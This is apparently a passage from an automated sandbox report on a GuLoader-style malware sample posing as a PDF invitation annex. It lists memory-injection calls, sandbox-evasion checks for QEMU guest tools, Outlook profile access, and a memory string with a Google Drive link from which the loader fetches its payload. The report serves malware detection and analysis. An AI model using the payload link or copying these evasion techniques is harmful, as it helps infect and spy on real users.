      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020ADEF70_2_020ADEF7
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AEF2F0_2_020AEF2F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7F5B0_2_020A7F5B
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AEF6B0_2_020AEF6B
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020ADF8B0_2_020ADF8B
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020ADFC30_2_020ADFC3
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A9C0F0_2_020A9C0F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7C2F0_2_020A7C2F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A6C4E0_2_020A6C4E
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A9C830_2_020A9C83
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7C9B0_2_020A7C9B
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020ADCE30_2_020ADCE3
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A9D070_2_020A9D07
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7D130_2_020A7D13
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020ADD170_2_020ADD17
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020ADD6F0_2_020ADD6F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7D730_2_020A7D73
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A9D740_2_020A9D74
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020ADDDB0_2_020ADDDB
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7DEB0_2_020A7DEB
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A9DE70_2_020A9DE7
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A942C NtAllocateVirtualMemory,0_2_020A942C
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020ADAD0 NtWriteVirtualMemory,0_2_020ADAD0
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AE9C2 NtProtectVirtualMemory,0_2_020AE9C2
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A820F NtWriteVirtualMemory,0_2_020A820F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A826F NtWriteVirtualMemory,0_2_020A826F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A82FB NtWriteVirtualMemory,0_2_020A82FB
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A835F NtWriteVirtualMemory,0_2_020A835F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A4364 NtWriteVirtualMemory,0_2_020A4364
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A83CB NtWriteVirtualMemory,0_2_020A83CB
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AD02E NtWriteVirtualMemory,0_2_020AD02E
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A8067 NtWriteVirtualMemory,0_2_020A8067
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A70A8 NtWriteVirtualMemory,0_2_020A70A8
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A80BB NtWriteVirtualMemory,0_2_020A80BB
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A8130 NtWriteVirtualMemory,0_2_020A8130
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A81BB NtWriteVirtualMemory,0_2_020A81BB
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A961B NtAllocateVirtualMemory,0_2_020A961B
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A9635 NtAllocateVirtualMemory,0_2_020A9635
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7643 NtWriteVirtualMemory,0_2_020A7643
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AB645 NtWriteVirtualMemory,0_2_020AB645
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A8663 NtWriteVirtualMemory,0_2_020A8663
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A76B3 NtWriteVirtualMemory,0_2_020A76B3
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A96CB NtAllocateVirtualMemory,0_2_020A96CB
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A86E3 NtWriteVirtualMemory,0_2_020A86E3
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7723 NtWriteVirtualMemory,0_2_020A7723
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A9747 NtAllocateVirtualMemory,0_2_020A9747
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A8753 NtWriteVirtualMemory,0_2_020A8753
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A77B8 NtWriteVirtualMemory,0_2_020A77B8
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AF7D5 NtWriteVirtualMemory,0_2_020AF7D5
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A945F NtAllocateVirtualMemory,0_2_020A945F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A8463 NtWriteVirtualMemory,0_2_020A8463
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A0494 NtWriteVirtualMemory,LoadLibraryA,0_2_020A0494
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A94C3 NtAllocateVirtualMemory,0_2_020A94C3
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A84FB NtWriteVirtualMemory,0_2_020A84FB
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A9523 NtAllocateVirtualMemory,0_2_020A9523
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A8547 NtWriteVirtualMemory,0_2_020A8547
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7552 NtWriteVirtualMemory,0_2_020A7552
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A9593 NtAllocateVirtualMemory,0_2_020A9593
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A95BD NtAllocateVirtualMemory,0_2_020A95BD
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A85CB NtWriteVirtualMemory,0_2_020A85CB
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7A6F NtWriteVirtualMemory,0_2_020A7A6F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AEA7F NtProtectVirtualMemory,0_2_020AEA7F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7AE7 NtWriteVirtualMemory,0_2_020A7AE7
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7BA3 NtWriteVirtualMemory,0_2_020A7BA3
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7807 NtWriteVirtualMemory,0_2_020A7807
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A788B NtWriteVirtualMemory,0_2_020A788B
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A790F NtWriteVirtualMemory,0_2_020A790F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A796E NtWriteVirtualMemory,0_2_020A796E
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7963 NtWriteVirtualMemory,0_2_020A7963
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7974 NtWriteVirtualMemory,0_2_020A7974
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A79FB NtWriteVirtualMemory,0_2_020A79FB
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020AEE11 NtProtectVirtualMemory,0_2_020AEE11
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7E6F NtWriteVirtualMemory,0_2_020A7E6F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7EE3 NtWriteVirtualMemory,0_2_020A7EE3
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7F5B NtWriteVirtualMemory,0_2_020A7F5B
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7C2F NtWriteVirtualMemory,0_2_020A7C2F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7C9B NtWriteVirtualMemory,0_2_020A7C9B
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7D13 NtWriteVirtualMemory,0_2_020A7D13
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7D73 NtWriteVirtualMemory,0_2_020A7D73
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A7DEB NtWriteVirtualMemory,0_2_020A7DEB
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 13_2_0056FBF7 LdrInitializeThunk,NtProtectVirtualMemory,13_2_0056FBF7
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 13_2_0056FD81 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,13_2_0056FD81
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 13_2_0056FE33 NtProtectVirtualMemory,13_2_0056FE33
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 13_2_0056FC2B LdrInitializeThunk,NtProtectVirtualMemory,13_2_0056FC2B
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 13_2_0056FBF1 LdrInitializeThunk,NtProtectVirtualMemory,13_2_0056FBF1
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 13_2_0056FB82 LdrInitializeThunk,NtProtectVirtualMemory,13_2_0056FB82
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 13_2_0056FBAF LdrInitializeThunk,NtProtectVirtualMemory,13_2_0056FBAF
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 13_2_0056FCAF NtProtectVirtualMemory,13_2_0056FCAF
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess Stats: CPU usage > 98%
      Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.338762831.000000000041C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameForm_reduc.exe vs Anexo I e II do convite#U00b7pdf.exe
      Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339931590.0000000002A90000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameForm_reduc.exeFE2X vs Anexo I e II do convite#U00b7pdf.exe
      Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000000.336777031.000000000041C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameForm_reduc.exe vs Anexo I e II do convite#U00b7pdf.exe
      Source: Anexo I e II do convite#U00b7pdf.exeBinary or memory string: OriginalFilenameForm_reduc.exe vs Anexo I e II do convite#U00b7pdf.exe
      Source: Anexo I e II do convite#U00b7pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Anexo I e II do convite#U00b7pdf.exeStatic PE information: invalid certificate
      Source: Anexo I e II do convite#U00b7pdf.exeVirustotal: Detection: 29%
      Source: Anexo I e II do convite#U00b7pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe "C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe"
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess created: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe "C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe"
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess created: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe "C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe" Jump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
      Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@3/2@2/3
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 0000000D.00000000.338047511.0000000000560000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_00402640 push 0040130Eh; ret 0_2_00402653
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_00402654 push 0040130Eh; ret 0_2_00402667
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_00402668 push 0040130Eh; ret 0_2_0040267B
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_0040267C push 0040130Eh; ret 0_2_0040268F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_00402604 push 0040130Eh; ret 0_2_00402617
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_00402618 push 0040130Eh; ret 0_2_0040262B
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_0040262C push 0040130Eh; ret 0_2_0040263F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_004026CC push 0040130Eh; ret 0_2_004026DF
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_004026E0 push 0040130Eh; ret 0_2_004026F3
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_004026F4 push 0040130Eh; ret 0_2_00402707
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_00402690 push 0040130Eh; ret 0_2_004026A3
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_004026A4 push 0040130Eh; ret 0_2_004026B7
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_004026B8 push 0040130Eh; ret 0_2_004026CB
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_00402744 push 0040130Eh; ret 0_2_00402757
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_00402758 push 0040130Eh; ret 0_2_0040276B
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_00404B67 push ds; ret 0_2_00404B68
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_0040276C push 0040130Eh; ret 0_2_0040277F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_00403D73 push esp; iretd 0_2_00403D74
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_00402708 push 0040130Eh; ret 0_2_0040271B
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_0040271C push 0040130Eh; ret 0_2_0040272F
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_0040231C push 0040130Eh; ret 0_2_00402603
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_00406F2A push ecx; retf 0_2_00406F3D
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_00402730 push 0040130Eh; ret 0_2_00402743
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_00402780 push 0040130Eh; ret 0_2_00402793
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_0040618C push 10768459h; retf 0_2_00406191
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_00402794 push 0040130Eh; ret 0_2_004027A7
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A942C push C30B40E8h; retf 5D80h0_2_020A991E
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A313B push cs; retf 0_2_020A313C
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A961B push C30B40E8h; retf 5D80h0_2_020A991E
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A9635 push C30B40E8h; retf 5D80h0_2_020A991E
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020A4640 push FFFFFF81h; ret 0_2_020A4642
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeFile created: \anexo i e ii do convite#u00b7pdf.exe
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeFile created: \anexo i e ii do convite#u00b7pdf.exeJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419267340.0000000000810000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1WOW1V-FWJJB6G5MIGMHVWOYYWXRCNCHQ
      Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339411798.0000000002870000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419267340.0000000000810000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339411798.0000000002870000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe TID: 6136Thread sleep count: 527 > 30Jump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe TID: 6988Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeCode function: 0_2_020ACEC8 rdtsc 0_2_020ACEC8
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeWindow / User API: threadDelayed 527Jump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeThread delayed: delay time: 60000Jump to behavior
      Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exeSystem information queried: ModuleInformationJump to behavior
